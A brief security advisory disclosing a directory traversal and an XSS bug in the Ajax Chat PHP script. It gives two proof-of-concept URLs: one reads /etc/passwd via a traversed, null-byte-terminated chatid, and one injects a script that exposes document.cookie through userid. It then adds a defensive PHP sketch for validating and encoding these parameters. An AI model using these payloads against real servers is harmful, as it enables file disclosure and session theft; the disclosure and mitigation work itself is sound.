Ajax Chat suffers from directory traversal and cross-site scripting vulnerabilities.
Discovered by Sirdarckcat from elhacker.net
Ajax Chat
http://www.pcdiscs.co.uk/chat/
==============================================
Ajax Chat is a web script for making an online
chat based on PHP and AJAX.
It has a Remote File Disclosure (RFD) bug and an XSS bug.
==============================================
RFD PoC:
http://www.server.com/includes/operator_chattranscript.php?chatid=../../../../../../etc/passwd%00
==============================================
XSS PoC:
http://www.server.com/visitor/livesupport/chat.php?userid=<script>alert(document.cookie)</script>
==============================================
Att.
Sirdarckcat
elhacker.net
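
A defender-side sketch of how the two parameters in the PoCs above (`chatid` and `userid`) could be handled. It is an added example, not Ajax Chat's own code. The digits-only `chatid` format, the `<chatid>.txt` transcript layout, the directory path and the helper names `transcript_path` and `html` are assumptions.

```php
<?php
// Added example: hypothetical helpers, not code from Ajax Chat.
// Assumption: transcripts are stored as <chatid>.txt in a single directory.
const TRANSCRIPT_DIR = '/var/www/chat/transcripts'; // assumed location

/** Map a chat id to a transcript file, or return null when the id is unsafe. */
function transcript_path(string $chatId, string $baseDir = TRANSCRIPT_DIR): ?string
{
    // Allowlist (assumed id format: digits only). This rejects "../", "/"
    // and the NUL byte that a trailing %00 becomes after URL decoding.
    if (preg_match('/\A[0-9]{1,12}\z/', $chatId) !== 1) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // Defence in depth: canonicalise, then require the result to remain
    // inside the transcript directory (covers symlinks as well).
    $path = realpath($base . DIRECTORY_SEPARATOR . $chatId . '.txt');
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

/** Encode a request value before echoing it into an HTML page. */
function html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed demo data in a temporary directory.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'transcripts_demo';
if (!is_dir($dir)) {
    mkdir($dir, 0700);
}
file_put_contents($dir . DIRECTORY_SEPARATOR . '42.txt', "visitor: hello\n");

// A well-formed id, then the chatid value from the RFD PoC after URL decoding.
var_dump(transcript_path('42', $dir));
var_dump(transcript_path("../../../../../../etc/passwd\0", $dir));

// The userid value from the XSS PoC, encoded for output as inert text.
echo html('<script>alert(document.cookie)</script>'), PHP_EOL;
```

The allowlist alone stops both the traversal sequence and the NUL byte; the `realpath` containment check is kept as a second layer in case the id format is later relaxed.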